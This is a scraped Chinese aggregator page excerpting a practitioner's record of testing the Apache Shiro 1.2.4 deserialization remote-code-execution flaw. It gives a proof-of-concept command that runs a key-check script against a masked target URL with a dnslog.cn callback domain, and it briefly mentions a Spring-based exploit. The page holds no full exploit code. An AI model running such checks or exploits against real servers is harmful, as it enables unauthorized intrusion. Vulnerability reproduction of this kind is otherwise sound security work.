shiro RCE （反序列化漏洞）

時間 2021-01-04

標籤紅藍對抗-攻防安全 web漏洞復現欄目系統安全简体版

原文原文鏈接

shiro RCE 攻擊這篇講1.2.4的反序列化漏洞在實戰中的記錄第一種比較穩妥的驗證漏洞方式： 1 POC python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn" DNSlog收到請求（平臺地址:http://www.dnslog.cn/） 2 EXP 這裏的回顯是基於spring框架的，其實可以直接用過監聽

>>阅读原文<<

相關文章

相關標籤/搜索

java序列化與反序列化

三：序列化與反序列化

Hibernate教程

PHP 7 新特性

代碼格式化

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。

最新文章

本站公眾號

歡迎關注本站公眾號,獲取更多信息

相關文章

>>更多相關文章<<